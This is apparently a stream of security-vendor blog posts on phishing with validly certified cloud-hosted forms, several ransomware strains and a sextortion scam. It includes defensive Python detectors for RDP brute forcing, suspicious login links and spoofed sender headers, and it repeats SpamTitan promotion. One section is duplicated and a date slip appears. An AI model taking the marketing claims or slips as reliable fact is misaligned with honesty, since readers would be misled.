Should a phishing email make it past perimeter defenses and land in an inbox, there are usually several tell-tale signs that the email is not authentic.

There are often spelling errors and incorrect grammar, and the messages are sent from questionable senders or domains. To improve the response rate, hackers are now spending much more time carefully crafting their phishing emails, and they are often practically indistinguishable from authentic communications from the brand being spoofed. In terms of formatting, they are carbon copies of genuine emails, complete with the branding, contact details, sender details, and logos of the company being spoofed. The subject is perfectly realistic and the content well composed. The actions the user is asked to take are perfectly believable.

Hyperlinks are included in emails that direct users to a website where they are required to enter their login details. At this point of the phishing attack there are usually further signs that all is not as it seems. A warning may appear that the website may not be authentic, the website may start with HTTP rather than the safe HTTPS, or the SSL certificate may not be owned by the company that the website is spoofing.

Even these indications are not always present, as has been shown in many recent Office 365 phishing attacks, which host the phishing forms on web pages that have valid Microsoft SSL certificates or SSL certificates issued to other cloud service providers such as CloudFlare, DocuSign, or Google.

Microsoft Azure Blob Storage Phishing Campaign

One recent phishing scam uses Azure blob storage to obtain a valid SSL certificate for the phishing form. Blob storage can be used for storing a variety of unstructured data. While it can be accessed over either HTTP or HTTPS, the phishing campaign uses the latter, which presents a valid SSL certificate issued to Microsoft.

In this campaign, end users are sent an email with a button that must be clicked to view the content of a cloud-hosted file. In this case, the document appears to be from a Denver law firm. Clicking the button sends the user to an HTML page hosted on Azure blob storage that requires Office 365 credentials to be entered to view the document. Since the page is hosted on Azure blob storage, a Microsoft service, it has a valid SSL certificate issued to Microsoft, adding legitimacy to the phishing attempt.

Entering login credentials into the form will send them to the attackers. The user will then be directed to another webpage, most likely unaware that they have been phished.

CloudFlare IPFS Gateway Targeted

A similar campaign has been discovered that abuses the CloudFlare IPFS gateway. Users can access content on the IPFS shared file system through a web browser. When linking to this gateway through a web browser, the HTML page will be secured with a CloudFlare SSL certificate. In this instance, the login requires data to be entered including username, password, and recovery email address and phone number – which will be forwarded to the hacker, while the user will be directed to a PDF file unaware that their details have been stolen.

Office 365 Phishing Protections are Not Enough

Office 365 users are being targeted by hackers because they know Office 365 phishing controls can be easily bypassed. Even with Microsoft’s Advanced Threat Protection for Office 365, phishing emails still get through. A 2017 study by SE Labs showed that even with this additional anti-phishing control, Office 365 anti-phishing measures were only rated in the low-middle of the market for security. With only the basic Exchange Online Protection, the protection was worse still.

Whether you run an SMB or a large enterprise, you are likely to receive high amounts of spam and phishing emails and many messages will be sent to end users’ inboxes. Since the emails can be virtually impossible for end users to identify as malicious, it is probable that all but the most experienced, well trained, security conscious workers will be tricked. What is therefore needed is an advanced third-party spam filtering solution that will work alongside Office 365 spam filtering controls to provide far greater security.

How to Make Office 365 Safer

While Office 365 will prevent spam emails and phishing emails (Osterman Research showed it prevents 100% of known malware), it has been shown to lack performance against advanced phishing threats including spear phishing.

Office 365 does not have the same level of predictive technology as specialized on-premises and cloud-based email security gateways which are much better at detecting zero-day attacks, new malware, and advanced spear phishing campaigns.

To greatly enhance protection what is needed is a dedicated third-party spam filtering solution for Office 365 such as SpamTitan. SpamTitan focuses on defense in depth, and supplies superior protection against advanced phishing attacks, new malware, and sophisticated email attacks to make sure malicious messages are blocked or quarantined rather than being sent to end users’ inboxes. Some of the extra protections provided by SpamTitan against Office 365 phishing attacks are detailed in the image here:


To discover more about making Office 365 safer and how SpamTitan can benefit your company, get in touch with TitanHQ. Our highly experienced sales consultants will be able to explain the full range of benefits of SpamTitan and the best deployment option, and can offer you a free trial to allow you to evaluate the solution for yourself.

New Variant of Dharma Ransomware Discovered

A new Dharma ransomware variant has been created that is evading detection by most antivirus engines. Heimdal Security has said that the most recent Dharma ransomware variant captured by its researchers was identified as malware by only one of the 53 AV engines on VirusTotal.

Dharma ransomware (also referred to as CrySiS) was first spotted in 2006 and is still being developed. In 2018, several new Dharma ransomware variants have been released, each using new file extensions for encrypted files (.bip, .xxxxx, .like, .java, .arrow, .gamma, .arena, .betta, and .tron to name but a few). In just the past two months, four new Dharma ransomware variants have been discovered.

Those to blame for Dharma ransomware have claimed many victims in recent months. Successful attacks have been made public recently by Altus Baytown Hospital in Texas, the Arran brewery in Scotland, and the port of San Diego.

While free decryptors for Dharma ransomware have been created, the constant evolution of this ransomware threat rapidly makes these decryptors obsolete. Infection with the latest variants leaves victims only three options: pay a sizeable ransom to recover files, restore files from backups, or accept permanent file loss.

The latter is not viable given the extent of files that are encrypted. Rescuing files from backups is not always possible as Dharma ransomware can also encrypt backup files and can erase shadow copies. Payment of a ransom should not be completed as there is no guarantee that files can or will be decrypted.

Safeguarding against ransomware attacks requires a combination of policies, procedures, and cybersecurity solutions. Dharma ransomware attacks are mostly carried out via two attack vectors: the exploitation of Remote Desktop Protocol (RDP) and email malspam campaigns.

The most recent Dharma ransomware variant attacks involve an executable file being dropped by a .NET file and an HTA file. Infections take place via RDP-enabled endpoints using brute force attempts to guess passwords. Once a password is guessed, the malicious payload is deployed.

While it is not yet known how the Arran brewery attack occurred, a phishing attack is suspected. Phishing emails had been received just prior to file encryption. “We cannot be 100 percent sure that this was the vector that infection occurred via, but the timing seems to be more than coincidental,” said Arran Brewery’s managing director Gerald Michaluk.

To safeguard against RDP attacks, RDP should be turned off unless it is absolutely necessary. If RDP is required, access should only be possible through a VPN and strong passwords should be put in place. Rate limiting on login attempts should be set up to block login attempts after a set number of failures.
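The monitoring counterpart of the rate limiting recommended above, as an added example that is not part of the original article: a burst of failed logons (Windows Security Event ID 4625) from one source address inside a short window, followed by a success (4624) from the same source, is the pattern that precedes the payload drop described for Dharma. Events, addresses and account names are constructed; in practice they come from the Security event log.

```python
"""Detect RDP password brute forcing from Windows logon events.

Added example (not from the original article). Event tuples are constructed
to look like Security log records: 4625 = failed logon, 4624 = successful logon.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed: (timestamp, event_id, source_ip, account_name)
SAMPLE_EVENTS = [
    ("2018-11-18T02:10:01", 4625, "203.0.113.7", "administrator"),
    ("2018-11-18T02:10:03", 4625, "203.0.113.7", "administrator"),
    ("2018-11-18T02:10:05", 4625, "203.0.113.7", "admin"),
    ("2018-11-18T02:10:06", 4625, "203.0.113.7", "backup"),
    ("2018-11-18T02:10:08", 4625, "203.0.113.7", "backup"),
    ("2018-11-18T02:10:09", 4625, "203.0.113.7", "administrator"),
    ("2018-11-18T02:10:12", 4624, "203.0.113.7", "backup"),
    ("2018-11-18T02:12:00", 4625, "198.51.100.4", "jsmith"),   # one typo, then success: normal
    ("2018-11-18T02:15:00", 4624, "198.51.100.4", "jsmith"),
]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return alerts as (source_ip, failures_in_window, distinct_accounts, followed_by_success).

    A source is flagged once it reaches `threshold` failures inside `window`;
    a later 4624 from the same source upgrades the alert, since a password that
    was guessed rather than remembered is the Dharma entry point.
    """
    recent = defaultdict(deque)     # source_ip -> failure timestamps inside the window
    accounts = defaultdict(set)     # source_ip -> account names attempted
    flagged = {}                    # source_ip -> index of its alert in `alerts`
    alerts = []
    for ts_str, event_id, src, account in sorted(events):
        ts = datetime.fromisoformat(ts_str)
        q = recent[src]
        while q and ts - q[0] > window:
            q.popleft()
        if event_id == 4625:
            q.append(ts)
            accounts[src].add(account)
            if len(q) >= threshold and src not in flagged:
                flagged[src] = len(alerts)
                alerts.append((src, len(q), len(accounts[src]), False))
        elif event_id == 4624 and src in flagged:
            ip, fails, n_acct, _ = alerts[flagged[src]]
            alerts[flagged[src]] = (ip, fails, n_acct, True)
    return alerts


def should_block(source_ip, alerts):
    """Policy hook for the rate limiting the article recommends: block any flagged source."""
    return any(ip == source_ip for ip, _, _, _ in alerts)


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
```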

Good backup policies are also essential, as they make file recovery possible without payment of a ransom. Multiple copies of backups should be made, with one copy held securely off site.

To safeguard against email-based attacks, an advanced spam filter is necessary. Spam filters that rely on AV engines may not spot the latest ransomware variants. Advanced reviews of incoming messages are vital.

SpamTitan can enhance protection for companies through a combination of two AV engines and predictive techniques to block new types of malware whose signatures have not yet been added to AV engines.

For additional information on SpamTitan and safeguarding your email gateway from ransomware attacks and other threats, contact TitanHQ’s security experts today.

New WebTitan and ArcTitan Integrations as Z Services Expands Partnership with TitanHQ

TitanHQ has recently expanded its partnership with Z Services, the leading SaaS provider of cloud-based cybersecurity solutions in the MENA region, which will result in new WebTitan and ArcTitan integrations.

Z Services operates 17 secure data centers in the UAE (base location), Qatar, Egypt, Saudi Arabia, Morocco, Jordan, Kuwait, Oman, Bahrain, and Kuwait. It is the only company in the Middle East and North Africa to offer a multi-tenant, cloud-based, in-country, cybersecurity architecture.

Z Services partnered with TitanHQ in February of 2017 and integrated TitanHQ’s award-winning email filtering technology into its service stack. Through doing this, it enabled Z Services to start offering SpamTitan-powered Z Services Anti-Spam SaaS to its clients. TitanHQ’s email filtering technology now also enables Z Services’ clients to filter out spam email and protect against sophisticated email-based threats such as malware, viruses, ransomware, botnets, phishing and spear phishing.

With the integration proving such a success for Z Services, the firm has now decided to take its partnership with TitanHQ to the next level by integrating two new TitanHQ-powered SaaS solutions into its service stack. WebTitan, TitanHQ’s award-winning web filtering technology, and ArcTitan, its innovative email archiving solution, have now both been incorporated into Z Services’ MERALE SaaS offering. MERALE has been specifically developed to meet the needs of small to medium sized enterprises for cybersecurity, threat protection, and compliance solutions.

“With cybersecurity growing as a critical business concern across the region, there is a clear need to make security an operational rather than a capital expense. Hence the paradigm shift in the delivery of effective security solutions from the traditional investment and delivery model to an agile SaaS model through the primary connectivity provider of SMEs – the ISPs,” explained Z Services’ President for the Middle East and North Africa, Nidal Taha. “MERALE will be a game-changer in how small and medium businesses in the region ensure their protection, and as a subscription-based service, it removes the need for heavy investments and long-term commitments.”

Speaking from TitanHQ’s point of view, CEO Ronan Kavanagh said: “We are delighted to continue our successful partnership with Z Services and share their vision for serving the SME segment with leading edge SaaS based security solutions. With this development Z Services is strengthening its leadership position as an innovative cloud-based cybersecurity solutions provider in the Middle East and North Africa.”

TitanHQ’s cloud-based cybersecurity solutions have been developed specifically to meet the needs of Managed Service Providers. More than 7,500 businesses worldwide are currently using the email filtering, web filtering, and email archiving solutions supplied by TitanHQ and more than 1,500 MSPs are now offering TitanHQ solutions to their clients.

When compared to many other cybersecurity solution providers, TitanHQ offers its products with a range of hosting options (including within an MSP’s own infrastructure), as full white label solutions ready for MSPs to apply their own branding. Through offering their clients TitanHQ solutions MSPs are able to significantly reduce costs related to support and engineering. They achieve this by blocking a wide range of cyber threats at source. MSPs also benefit from generous margins and world class customer service and support.

If you are an MSP and have not yet incorporated email filtering, web filtering, and email archiving solutions into your service stack, if you are unhappy with your current providers, or are looking to increase profits significantly while also ensuring your clients have the best protection against email and web-based threats, contact TitanHQ today for further information.

Users with Valid SSL Certificates Being Tricked by CloudFlare IPFS Gateway Phishing Forms

The CloudFlare IPFS gateway has only recently been made publicly available, but it is already being used by phishers to serve malicious content. CloudFlare IPFS gateway phishing attacks are likely to have a good success rate, as some of the checks carried out by end users to confirm the legitimacy of domains will not raise red flags.

The IPFS gateway provides access to a P2P system that permits files to be shared easily throughout a group and accessed through a web browser. Content is distributed across different nodes in the network. The system can be used for creating and sharing websites, and CloudFlare has made this process simpler by offering free SSL certificates and allowing domains to be easily linked to IPFS.

If phishers host their phishing forms on CloudFlare IPFS, they can use CloudFlare’s SSL certificate. Since the phishing page will begin with cloudflare-ipfs.com, this adds legitimacy. The CloudFlare-owned domain is more likely to be trusted than other phishing domains.

When CloudFlare IPFS Gateway phishing forms are detected, visitors will be advised that the webpage is secure, the site starts with HTTPS, and a green padlock will be displayed. If the visitor takes the time to check certificate information of the web page, they will find it has been issued to CloudFlare-IPFS.com by CloudFlare Inc., and the certificate is authentic. The browser will not serve any warning and CloudFlare IPFS Gateway phishing content will therefore seem genuine.

At least one threat actor is using the CloudFlare IPFS Gateway for phishing and is hosting forms that state they are standard login pages for Office 365, DocuSign, Azure AD, and other cloud-based services, complete with proper logos.

If a visitor fills out the form information, their credentials will be forwarded to the operator of a known phishing domain – searchurl.bid – and the user will be shown a document about business models, strategy and innovation. This may also not lead to a red flag.

The CloudFlare IPFS Gateway phishing strategy is like that used on Azure Blob storage, which also takes advantage of a legitimate SSL certificate. In that case the certificate is issued to Microsoft.

It is becoming more and more important for phishers to use HTTPS for hosting phishing content. As more businesses move from HTTP to HTTPS, and browsers such as Chrome now display warnings to users about insecure sites, phishers have similarly had to move to HTTPS. Both the CloudFlare IPFS Gateway and Azure Blob storage offer a simple way to do this.

In both instances, links to the malicious forms are distributed through spam email. One of the most typical ways to do this is to include an email attachment containing a button which must be clicked in order to download content. The user is told that the content of the file is secured, and that work email login credentials must be entered in order to see it. The document may be an invoice, a purchase order, or a scanned document that needs to be reviewed.

The rise in use of cloud platforms to host phishing content makes it more important than ever for groups to set up advanced phishing defenses. A strong spam filter such as SpamTitan should be used to block the initial emails and prevent them from being sent to end users’ inboxes. These phishing tactics should also be included in security awareness training to raise awareness of the threat and to warn users that SSL certificates do not necessarily mean the content of a web page is authentic. Web filtering solutions are also vital for restricting access to known malicious web pages, should a user click on a malicious link.
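The point made in this section and in the Azure Blob storage campaign above is that a valid certificate only vouches for the platform that owns the host name, not for the brand whose login page is shown. The following is an added example, not code from the original articles, that encodes that check offline: the host is taken from the URL, matched against shared-hosting domains any tenant can publish to, and compared with the brand the page claims to be. The hosting-domain and brand sign-in lists are illustrative and constructed for the example, not a complete inventory.

```python
"""Rate a login link by who the TLS certificate really vouches for versus the brand it imitates.

Added example (not from the original article). SHARED_HOSTING and
BRAND_LOGIN_HOSTS are constructed, illustrative lists; extend them from your
own allow-lists in practice.
"""
from urllib.parse import urlparse

# Shared platforms on which any tenant can publish content under the platform's certificate.
SHARED_HOSTING = {
    "cloudflare-ipfs.com": "CloudFlare",
    "blob.core.windows.net": "Microsoft",
    "web.core.windows.net": "Microsoft",
    "storage.googleapis.com": "Google",
}

# Hosts on which each brand legitimately serves its own sign-in page (constructed, not exhaustive).
BRAND_LOGIN_HOSTS = {
    "Office 365": {"login.microsoftonline.com", "login.live.com"},
    "Azure AD": {"login.microsoftonline.com"},
    "DocuSign": {"account.docusign.com"},
}


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def matches_suffix(host, domain):
    """True if host is `domain` or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def assess_login_link(url, claimed_brand, cert_subject_org=None):
    """Return (verdict, reason) for a page presenting itself as `claimed_brand`'s login.

    cert_subject_org is the organisation named in the served certificate, if the
    caller has already fetched it; it is only used to explain the verdict.
    """
    parsed = urlparse(url)
    host = host_of(url)
    if parsed.scheme != "https":
        return "suspicious", "login form served without TLS"
    for domain, platform in SHARED_HOSTING.items():
        if matches_suffix(host, domain):
            # The padlock is real, but it belongs to the platform, not to the brand.
            cert_note = f" (certificate issued to {cert_subject_org})" if cert_subject_org else ""
            return "suspicious", (f"{claimed_brand} login hosted on {platform} shared platform "
                                  f"{domain}{cert_note}; any tenant can publish there")
    if any(matches_suffix(host, h) for h in BRAND_LOGIN_HOSTS.get(claimed_brand, ())):
        return "ok", f"host {host} is a known {claimed_brand} sign-in host"
    return "review", f"{claimed_brand} login on unrecognised host {host}"


if __name__ == "__main__":
    print(assess_login_link("https://cloudflare-ipfs.com/ipfs/QmCONSTRUCTED/login.html",
                            "Office 365", "Cloudflare, Inc."))
    print(assess_login_link("https://login.microsoftonline.com/common/oauth2/authorize",
                            "Office 365"))
```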

Universities Targeted as Hackers Search for Valuable Research Data

Hackers have been targeting universities extensively in the last year, according to figures recently released by Kaspersky Lab.

Universities store very valuable information. Research groups collate valuable proprietary data, and the results of research studies are particularly valuable. It may not be possible to sell such data as easily as credit card and Social Security numbers, but there are certainly buyers who will pay top dollar for valuable research. Nation state sponsored hacking groups are focusing on universities, and independent hacking groups are getting in on the act and carrying out cyberattacks on universities.

There are many possible attack vectors that can be used to gain access to university systems. Software flaws that have yet to be patched can be targeted, misconfigured cloud services such as unsecured S3 buckets can be accessed, and brute force attempts can be used to guess passwords. However, phishing attacks on universities are frequently observed.

Phishing is often associated with scams to obtain credit card information or login details for Office 365 accounts, with companies and healthcare organizations often targeted. Universities are also in the firing line and are being attacked.

Phishing is so common because it is often the simplest way to access targeted networks, or at least to gain a foothold for further attacks. Universities are naturally careful about protecting their research and security controls are usually implemented accordingly. Phishing allows those controls to be bypassed relatively easily.

A successful phishing attack on a student may not result in much damage, at least initially. However, once access to their email account is obtained, it can be used for additional phishing attacks on lecturers for example.

Spear phishing attacks on lecturers and research associates offer a more direct route. They are likely to have higher privileges and access to sought-after research data. Their accounts are also likely to contain other interesting and useful information that can be used in a wide variety of secondary attacks.

Email-based attacks can include malicious attachments that deliver information-stealing malware such as keyloggers, although many of the latest attacks have used links to fake university login web pages. The login pages are identical copies of the genuine login pages used by universities, the only difference being the URL on which the page is hosted.

Kaspersky Lab has revealed that over 1,000 phishing attacks on universities have been detected in the past 12 months, and 131 universities have been targeted. Those universities are spread across 16 different countries, although 83 of the 131 universities were in the United States.

Stopping phishing attacks on universities, staff, and students requires a multi-layered approach. Technical security measures must be implemented to reduce risk, such as an advanced spam filter to block the majority of phishing emails and stop them from reaching end users. A web filtering solution is vital for restricting access to phishing websites and web pages hosting malware. Multi-factor authentication is also vital to ensure that if credentials are compromised or passwords are guessed, an extra form of authentication is required to gain access to accounts.

As a last line of defense, staff and students should be trained so they are aware of the risk from phishing.

Office 365 Phishing Attacks Using Cloud Service Providers’ SSL Certificates

Office 365 phishing attacks are common and very realistic, and Office 365 spam filtering controls are easily bypassed by cybercriminals to ensure messages land in inboxes. Further, phishing forms are being hosted on web pages that are secured with valid Microsoft SSL certificates to trick users into believing that the websites are genuine.

Should a phishing email get past perimeter defenses and arrive in an inbox, there are often many giveaway signs that the email is not genuine.

There are often spelling errors, bad grammar, and the messages are sent from suspicious senders or domains. To improve the response rate, cybercriminals are now spending much more time carefully creating their phishing emails, and they are often virtually indistinguishable from real communications from the brand they are spoofing. Formatting-wise, they are carbon copies of real emails, complete with the branding, contact information, sender details, and logos of the business being spoofed. The subject is perfectly realistic and the content well composed. The actions the user is asked to take are perfectly plausible.

Hyperlinks are included in emails that direct users to a website where they are asked to enter their login credentials. At this stage of the phishing attack there are usually more indications that all is not as it seems. A warning may flash up that the website may not be authentic, the website may begin with HTTP rather than the secure HTTPS, or the SSL certificate may not be owned by the company that the website is spoofing.

Even these tell-tale signs are not always present, as has been shown in many recent Office 365 phishing attacks, which have the phishing forms hosted on web pages that have valid Microsoft SSL certificates or SSL certificates that have been issued to other cloud service providers such as CloudFlare, DocuSign, or Google.

To greatly enhance your security measures you will require a dedicated third-party spam filtering solution for Office 365 such as SpamTitan. SpamTitan focuses on defense in depth, and supplies superior protection against advanced phishing attacks, new malware, and complex email attacks to ensure malicious messages are restricted or quarantined rather than being sent to end users’ inboxes. Some of the additional security measures supplied by SpamTitan against Office 365 phishing attacks are detailed in the image here:

To find out more about making Office 365 more secure and how SpamTitan can benefit your company, contact TitanHQ. Our highly experienced sales consultants will be able to advise you on the full range of benefits of SpamTitan, the best deployment option, and can offer you a free trial to allow you to personally evaluate the solution before committing to a purchase.

 

Chinese and English Speakers Targeted by New RaaS Variant of FilesLocker Ransomware

FilesLocker, a new ransomware threat, has been discovered and is currently being offered as ransomware-as-a-service (RaaS) via a TOR malware forum. FilesLocker ransomware is not an extremely sophisticated ransomware variant, but it still poses a major threat.

FilesLocker ransomware is a dual language ransomware variant that shows ransom notes in both Chinese and English. MalwareHunterTeam has found a Chinese forum on TOR where it is being offered to affiliates to distribute for a percentage of the ransom payments.

Unless advertised more widely, the number of affiliates that sign up may be limited, although it may prove popular. There are a number of features that could see this ransomware variant favored over other RaaS offerings, notably a sliding scale of commissions. The developers are offering a 60% cut of ransoms, which rises to 75% if sufficiently high numbers of infections can be generated.

While relatively straightforward, FilesLocker ransomware still uses RSA-2048 plus AES to encrypt files, and it deletes Windows shadow copies to hamper efforts to recover files without paying the ransom. FilesLocker is also capable of encrypting files in a disconnected network environment.

No server is needed, and the ransomware works on all Windows versions later than XP, plus 32-bit and 64-bit Windows Server. Affiliates can also easily keep track of infections through a tracking feature that displays infections by country.

There is no free decryptor for FilesLocker ransomware in existence. Recovery can only be completed by restoring files from backups.

While news of a new RaaS offering is never welcome, there has at least been some good news on the ransomware front this week, at least for some victims.

GandCrab ransomware is another RaaS offering that has been for sale since January 2018. It has been widely adopted, with many affiliates using it to distribute the ransomware over the past 10 months.

A GandCrab ransomware decryptor was designed by Bitdefender in February that was able to unlock files encrypted by version 1.0 and v1.1 of GandCrab ransomware. The decryptor was developed after private keys were released online. However, it didn’t take long for v2.0 to be released, for which no free decryptor is available. There have been a number of further updates to GandCrab ransomware over the past few months, with v5.0 of the ransomware variant released in late September.

This week, Bitdefender has revealed that after collaboration with the Romanian Police, Europol and other law enforcement bodies, a new decryption tool has been developed that permits GandCrab ransomware victims to decrypt files for free, provided they have been infected with version 1, 4, or 5 of the ransomware.

The version can be deduced from the extension added to encrypted files: v1 = GDCB; v2/v3 = CRAB; v4 = KRAB; v5 uses a completely random 10-character extension.

The free GandCrab ransomware decryptor has been added to the NoMoreRansom Project website. Bitdefender is currently working on a free decryptor for v2 and v3 of GandCrab ransomware.

Recipe Unlimited Ryuk Ransomware Attack Leads to Restaurant Closures

What is thought to have been a Ryuk ransomware attack on Recipe Unlimited, a group of some 1,400 restaurants in Canada and North America, has forced the chain to shut down computers and temporarily close the doors of some of its restaurants while IT teams try to address the attack.

Recipe Unlimited, previously known as Cara Operations, operates pubs and restaurants under many different titles, including Harvey’s, Swiss Chalet, Kelseys, Milestones, Montana’s, East Side Mario’s, Bier Markt, Prime Pubs, and the Landing Group of Restaurants. All of these pub and restaurant brands have been impacted by the Recipe Unlimited ransomware attack.

While only a relatively small number of restaurants were forced to close, the IT outage caused widespread issues, stopping the restaurants that remained open from taking card payments from customers and using register systems to complete orders.

While it was at first unclear what caused the outage, a ransomware attack on Recipe Unlimited was later confirmed. A staff member at one of the impacted restaurants provided CBC News with a copy of the ransom note that had appeared on the desktop of one of the infected computers.

The ransom note is the same as that used by the threat actors behind Ryuk ransomware. They claim that files were encrypted with “military algorithms” which cannot be decrypted without a key that is only available from them. While it is unclear exactly how much the hackers demanded to decrypt files, they did threaten to increase the cost by 0.5 BTC (approx. $4,000 CAD) per day until contact was made. The Recipe Unlimited ransomware attack is thought to have taken place on September 28. Some restaurants remained closed on October 1.

The ransomware attack on Recipe Unlimited is just one of the recently witnessed attacks involving Ryuk ransomware. The hackers are understood to have gathered more than $640,000 in ransom payments from companies that had no option other than to pay for the keys to unlock their files. The ransomware attack on Recipe Unlimited did not add to that total, as Recipe Unlimited performed regular backups and expects to be able to restore all systems and data, although naturally that will take some time.

Ransomware attacks on restaurants, businesses, healthcare suppliers, and cities are extremely common and can be incredibly costly to address. The recent City of Atlanta ransomware attack caused widespread disruption due to the massive scale of the attack, involving thousands of computers.

The cost of addressing the attack, including upgrades to its systems, is likely to be around $17 million, according to estimates from city officials. The ransomware attack on the Colorado Department of Transportation is estimated to cost $1.5 million to resolve.

There is no straightforward solution that will block ransomware attacks, as many different vectors are used to download the malicious file-encrypting software. Preventing ransomware attacks requires defense in depth and multiple software solutions.

Spam filtering solutions should be used to stop email delivery of ransomware, web filters can be set up to prevent access to malicious websites where ransomware is downloaded, antivirus solutions may detect infections in time to block attacks, and intrusion detection systems and behavioral analytics solutions are useful to quickly identify an attack in progress and limit the harm inflicted.

All operating systems and software must be kept fully up to date, strong passwords should be enforced, and end users must receive training to make them aware of the danger posed by ransomware. They should be trained in security best practices and in how to identify threats. Naturally, robust backup policies are necessary to ensure that in the event of disaster, files can be recovered without having to meet the ransom demand.

New Sextortion Scam: Emails Appear to Have Been Sent from User’s Email Account

A new sextortion scam has been discovered that tries to fool the recipient of the message into believing their email account has been compromised and that their computer is under full control of the hacker.

The hackers spoof the user’s email address so that the message appears to have been sent from the user’s own email account: the sender and the recipient are exactly the same.

A quick and simple check that can be performed to determine whether the sender name shown matches the account actually used to send the email is to click forward. When this is done, the display name is shown, but so too is the actual email address from which the message was sent. In this case, that check does not help, which makes it appear that the user’s email account really has been compromised.
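The forward trick only reveals the From header, which the sender controls. A defender can go one step further and compare that header with the envelope sender (Return-Path) and the Authentication-Results written by the receiving mail server, which are much harder to forge. The following is an added example written for this article, not code from the original post; the two messages are constructed, and it assumes your own mail server adds Return-Path and Authentication-Results headers.

```python
"""Check whether a message that appears to come from the recipient's own
address was really sent from that account. Added example, not part of the
original article; the two sample messages below are constructed."""
from email import message_from_string
from email.utils import parseaddr


def _addr(header_value: str) -> str:
    """Extract the bare, lower-cased address from a From/To/Return-Path value."""
    return parseaddr(header_value or "")[1].lower()


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1] if "@" in addr else ""


def analyse_self_addressed(raw_message: str) -> dict:
    """Compare the forgeable From header with the envelope sender (Return-Path)
    and the Authentication-Results header. Both of the latter are written by
    the receiving mail server, so they are assumed trustworthy here (if your
    server does not add them, the corresponding checks simply report False)."""
    msg = message_from_string(raw_message)
    from_addr = _addr(msg.get("From"))
    to_addr = _addr(msg.get("To"))
    return_path = _addr(msg.get("Return-Path"))
    auth = (msg.get("Authentication-Results") or "").lower()

    result = {
        # the sextortion lure: sender and recipient are the same mailbox
        "self_addressed": bool(from_addr) and from_addr == to_addr,
        # the bounce address belongs to a different domain than the From header
        "return_path_mismatch": bool(return_path)
        and _domain(return_path) != _domain(from_addr),
        "spf_failed": "spf=fail" in auth or "spf=softfail" in auth,
        "dkim_passed": "dkim=pass" in auth,
        "dmarc_failed": "dmarc=fail" in auth,
    }
    result["likely_spoofed"] = result["self_addressed"] and (
        result["return_path_mismatch"] or result["spf_failed"] or result["dmarc_failed"]
    )
    return result


# Constructed sample: a sextortion-style message spoofing the recipient's own address.
SPOOFED_SAMPLE = """\
Return-Path: <bounce-4471@mailer.example.net>
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=mailer.example.net; dkim=none; dmarc=fail header.from=example.com
From: "Alice Example" <alice@example.com>
To: alice@example.com
Subject: Your account has been hacked

I have full control of your computer...
"""

# Constructed sample: a genuine note-to-self sent through the user's own provider.
LEGIT_SAMPLE = """\
Return-Path: <alice@example.com>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com
From: alice@example.com
To: alice@example.com
Subject: Reminder

Pick up the keys on Friday.
"""

if __name__ == "__main__":
    for label, sample in (("spoofed", SPOOFED_SAMPLE), ("legit", LEGIT_SAMPLE)):
        print(label, analyse_self_addressed(sample))
```

Only headers added by your own receiving server should be trusted; a sender can include fake Authentication-Results of their own, so strip or ignore any such header that arrives from outside.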

The messages used in this campaign try to extort money by suggesting the hacker has obtained access to the user’s computer by means of a computer virus. It is alleged that the virus gives the attacker the ability to review the user’s internet activities in real time and use the computer’s webcam to record the user.

The hacker claims that the virus was installed on the computer because the user visited an adult website, and that while the user was viewing internet pornography the webcam was active and recording. “Your tastes are so weird,” states the hacker in the email.

The hacker claims that they will sync the webcam footage with the content that the user was viewing and send a copy of the video to the user’s partner, friends, and relatives. It is claimed that all the user’s accounts have been compromised. The message also includes an example of one of the user’s passwords.

While it is very unlikely that the password given in the email is valid for any of the user’s accounts, the message itself will still be worrying for some individuals and will be enough to get them to make the requested payment of $800 to have the footage erased.

In reality, this is a sextortion scam in which the hackers have no leverage, as there is no virus and no webcam footage. However, it is clear that at least some recipients were not willing to take the risk.

According to security experts SecGuru, who received a version of the email in Dutch and found a similar English language version, the Bitcoin account used by the hacker had received payments of 0.37997578 Bitcoin – $3,500 – in the first two days of the attack. Now, 7 days after the first payment was completed, the earnings have grown to 1.1203 Bitcoin – $6,418 – with 15 people having paid.

A similar sextortion scam was carried out in the summer which also had an interesting twist. It included an old password for the account that had been obtained from a data dump. In that instance, the password was genuine, at least at some point in the past, which made the scam seem authentic.

 

Increase in Phishing Attacks on Publishers and Literary Scouting Agencies Leads to Warning

Financial entities, healthcare groups and universities have seen a growth in cyberattacks in recent times, but there has also been a rise in phishing attacks on publishers and literary scouting agencies.

Any company that stores sensitive information that can be sold for profit is in danger from cyberattacks, and publishers and literary scouting agencies are no different. Like any employer, scouting agencies and publishers hold sensitive information such as bank account numbers, credit card details, Social Security numbers, contract information, and W-2 Tax forms, all of which have a high value on the black market. The companies also normally complete wire transfers and are therefore targets for BEC hackers.

However, recently there have been many reports of phishing attacks on publishers and literary scouting agencies that attempt to obtain access to unpublished manuscripts and typescripts. These are always extremely valuable. If an advance copy of an eagerly awaited book can be obtained before it is released, there will be no shortage of fans willing to hand over money for a copy. Theft of manuscripts can result in extortion efforts with ransoms demanded to stop their publication online.

2018 has seen a major rise in phishing attacks on publishers and literary scouting agencies. At present, campaigns are being carried out by hackers that seem to have a good understanding of the sector. Highly realistic and plausible emails are being shared to publishing houses and agencies which use the proper industry terminology, which suggests they are the work of an industry insider.

A rise in phishing attacks on publishers on both sides of the Atlantic has been recorded, with the threat already having led Penguin Random House North America to issue warnings to employees about the threat. According to a recent report in The Bookseller, many publishers have been targeted with phishing schemes like this, including Penguin Random House UK and Pan Macmillan.

Safeguarding from phishing attacks requires a combination of technical solutions, policies and procedures, and employee guidance.

Publishers and scouting agencies should implement software solutions that can prevent phishing attacks and prevent malicious emails from being sent to their employees’ inboxes.

SpamTitan is a strong anti-phishing tool that blocks 99.97% of spam emails and 100% of known malware. DMARC email-validation is included to detect email spoofing and stop malicious emails from arriving in employees’ inboxes.

End user training is also crucial to grow awareness of the risks of phishing. All staff should be shown how to recognize phishing emails and other email threats to see to it that they do not fall for these email scams.

